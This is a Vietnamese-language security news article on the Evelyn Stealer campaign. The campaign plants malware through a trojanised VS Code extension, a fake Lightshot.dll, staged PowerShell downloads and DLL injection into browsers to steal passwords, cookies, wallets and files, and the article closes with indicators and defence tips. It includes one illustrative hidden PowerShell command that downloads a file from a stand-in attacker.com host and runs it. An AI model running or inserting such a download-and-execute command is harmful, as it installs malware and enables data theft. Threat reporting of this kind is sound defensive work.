Mã độc Stealer Evelyn: Nguy hiểm rình rập nhà phát triển qua VS Code

Các tác nhân đe dọa đang biến Visual Studio Code thành một nền tảng tấn công, khai thác hệ sinh thái tiện ích mở rộng phong phú của nó để lây nhiễm mã độc Stealer Evelyn theo nhiều giai đoạn vào máy trạm của nhà phát triển.

Chiến dịch mới nhất, được đặt tên là Evelyn Stealer, ẩn mình sau một tiện ích mở rộng độc hại. Tiện ích này lén lút triển khai một công cụ đánh cắp thông tin qua nhiều bước được dàn dựng cẩn thận.

Thay vì nhắm mục tiêu vào người dùng cuối, những kẻ tấn công tập trung vào các nhà phát triển. Họ thường nắm giữ chìa khóa đến mã nguồn, bảng điều khiển đám mây và tài sản tiền điện tử quan trọng.

Chiến dịch Evelyn Stealer và Bản chất mối đe dọa

Chiến dịch Evelyn Stealer đại diện cho một mối đe dọa mạng tinh vi. Nó lợi dụng sự tin cậy vào nền tảng phát triển được sử dụng rộng rãi, cụ thể là Visual Studio Code.

Các nhà phân tích của Trend Micro đã lưu ý rằng những kẻ tấn công vũ khí hóa sự tin cậy vào thị trường Visual Studio Code. Tiện ích mở rộng được sử dụng để dàn dựng một chuỗi tấn công đầy đủ, từ trình tải ban đầu đến việc đánh cắp dữ liệu cuối cùng. Thông tin chi tiết về chiến dịch có thể tìm thấy tại đây.

Kỹ thuật tấn công và Chuỗi lây nhiễm

Cuộc tấn công bắt đầu khi nạn nhân cài đặt một tiện ích mở rộng Visual Studio Code đã bị trojan hóa. Tiện ích này xuất hiện hữu ích hoặc vô hại đối với người dùng.

Ẩn sau hậu trường, nó thả một thành phần giả mạo tên là Lightshot.dll. Thành phần này sau đó được tải bởi công cụ chụp màn hình hợp pháp Lightshot.exe mỗi khi người dùng thực hiện thao tác chụp màn hình.

Bằng cách lạm dụng một công cụ quen thuộc như Lightshot và sử dụng các export có vẻ đã ký, giai đoạn đầu tiên hòa trộn vào hoạt động phát triển bình thường. Đồng thời, nó âm thầm thiết lập các giai đoạn sau của sự thỏa hiệp.

Giai đoạn ban đầu: Phần mở rộng độc hại của Visual Studio Code

Giai đoạn đầu tiên nằm bên trong một tiện ích mở rộng độc hại của Visual Studio Code. Nó ngụy trang thành Lightshot.dll và được thực thi bởi Lightshot.exe khi được kích hoạt.

Khi được kích hoạt, trình tải xuống này khởi chạy một lệnh PowerShell ẩn. Lệnh này kéo một tệp giai đoạn thứ hai có tên iknowyou.model từ một miền từ xa.

# Ví dụ minh họa về lệnh PowerShell được kích hoạt# Lệnh thực tế có thể khác, nhưng mục tiêu là tải xuống và thực thiStart-Process -WindowStyle Hidden powershell.exe -ArgumentList "Invoke-WebRequest -Uri hxxp://attacker.com/iknowyou.model -OutFile C:\Users\Public\runtime.exe; Start-Process C:\Users\Public\runtime.exe"

Giai đoạn trung gian: Tải xuống và thực thi mã độc

Tệp iknowyou.model được lưu dưới dạng runtime.exe và sau đó được thực thi trên hệ thống bị xâm nhập.

Từ đó, chuỗi mã độc tiếp tục, tìm nạp các payload mới, khởi chạy các lệnh PowerShell ẩn và chuẩn bị nền tảng cho tệp thực thi Evelyn Stealer cuối cùng.

Giai đoạn cuối: Kích hoạt Evelyn Stealer

Payload của mã độc Stealer Evelyn tạo một thư mục AppData\Evelyn. Nó tiêm abe_decrypt.dll vào các tiến trình của trình duyệt Edge và Chrome để thu thập thông tin.

Sau khi được thực thi hoàn toàn, Evelyn Stealer thu thập mật khẩu trình duyệt, cookie, ví tiền điện tử, phiên nhắn tin, hồ sơ VPN, khóa Wi-Fi và các tệp nhạy cảm từ máy bị xâm nhập.

Nó cũng chụp ảnh màn hình và thông tin hệ thống chi tiết. Sau đó, tất cả dữ liệu này được nén vào một kho lưu trữ duy nhất và tải lên một máy chủ FTP do kẻ tấn công kiểm soát.

Dữ liệu bị đánh cắp và Hậu quả

Thông tin mục tiêu của Evelyn Stealer

Evelyn Stealer tập trung vào việc đánh cắp một loạt thông tin nhạy cảm từ các hệ thống bị xâm nhập. Các loại dữ liệu bao gồm:

• Mật khẩu trình duyệt và cookie.
• Ví tiền điện tử.
• Phiên làm việc của các ứng dụng nhắn tin.
• Hồ sơ VPN và khóa Wi-Fi.
• Các tệp nhạy cảm trên máy tính.
• Ảnh chụp màn hình và thông tin hệ thống chi tiết.

Tất cả dữ liệu này được nén thành một tệp duy nhất và được đẩy lên máy chủ FTP của kẻ tấn công. Đây là một vụ rò rỉ dữ liệu nghiêm trọng.

Rủi ro doanh nghiệp từ hệ thống bị xâm nhập

Đối với các tổ chức, một máy tính xách tay của nhà phát triển bị nhiễm có thể làm lộ mã nguồn, token truy cập đám mây và thông tin xác thực sản xuất.

Điều này biến một sai sót trong chuỗi công cụ thành một vụ rò rỉ dữ liệu rộng lớn, gây ra những hậu quả nghiêm trọng về an toàn thông tin.

Việc chiếm đoạt thông tin truy cập hệ thống và tài nguyên đám mây qua tấn công mạng này có thể dẫn đến thiệt hại đáng kể và tổn thất lớn cho doanh nghiệp.

Chỉ số IOCs (Indicators of Compromise)

Dựa trên nội dung gốc, các chỉ số thỏa hiệp (IOCs) cụ thể như hash tệp, địa chỉ IP hoặc miền C2 chưa được cung cấp chi tiết cho chiến dịch Evelyn Stealer.

Tuy nhiên, các tệp và thành phần liên quan đến chiến dịch này bao gồm:

• Tên tệp độc hại: Lightshot.dll (tệp giả mạo), iknowyou.model (tên gốc của payload), runtime.exe (tên tệp sau khi lưu và thực thi).
• Thư mục được tạo: AppData\Evelyn (được tạo bởi payload).
• DLL được tiêm: abe_decrypt.dll (được tiêm vào trình duyệt).

Phòng ngừa và Bảo vệ

Để bảo vệ khỏi các chiến dịch như mã độc Stealer Evelyn, các tổ chức và nhà phát triển cần thực hiện các biện pháp bảo mật chặt chẽ.

Điều này bao gồm việc kiểm tra kỹ lưỡng các tiện ích mở rộng của Visual Studio Code trước khi cài đặt. Chỉ nên sử dụng các tiện ích từ nguồn đáng tin cậy và đã được xác minh.

Việc triển khai các giải pháp an ninh mạng toàn diện, bao gồm phần mềm chống mã độc, hệ thống phát hiện xâm nhập (IDS/IPS) và giám sát hoạt động mạng bất thường, là rất quan trọng.

Đảm bảo các hệ thống và ứng dụng luôn được cập nhật bản vá bảo mật mới nhất cũng giúp giảm thiểu rủi ro bị khai thác bởi các lỗ hổng đã biết.